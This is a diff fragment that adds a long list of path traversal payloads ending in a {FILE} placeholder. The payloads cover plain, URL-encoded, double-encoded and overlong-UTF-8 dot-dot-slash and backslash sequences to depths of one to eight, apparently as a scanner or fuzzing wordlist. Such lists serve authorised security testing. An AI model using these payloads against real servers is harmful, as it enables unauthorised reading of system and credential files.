+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
+ "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
+ "true,..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
+ "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
+ "true,..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
+ "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
+ "true,..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
+ "true,%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
+ "true,..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
+ "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
+ "true,%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
+ "true,%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
+ "true,../{FILE}",
+ "true,../../{FILE}",
+ "true,../../../{FILE}",
+ "true,../../../../{FILE}",
+ "true,../../../../../{FILE}",
+ "true,../../../../../../{FILE}",
+ "true,../../../../../../../{FILE}",
+ "true,../../../../../../../../{FILE}",
+ "true,..%2f{FILE}",
+ "true,..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,..%252f{FILE}",
+ "true,..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,..\\{FILE}",
+ "true,..\\..\\{FILE}",
+ "true,..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..%5c{FILE}",
+ "true,..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,..%255c{FILE}",
+ "true,..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,../{FILE}",
+ "true,../../{FILE}",
+ "true,../../../{FILE}",
+ "true,../../../../{FILE}",
+ "true,../../../../../{FILE}",
+ "true,../../../../../../{FILE}",
+ "true,../../../../../../../{FILE}",
+ "true,../../../../../../../../{FILE}",
+ "true,..%2f{FILE}",
+ "true,..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,..%252f{FILE}",
+ "true,..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
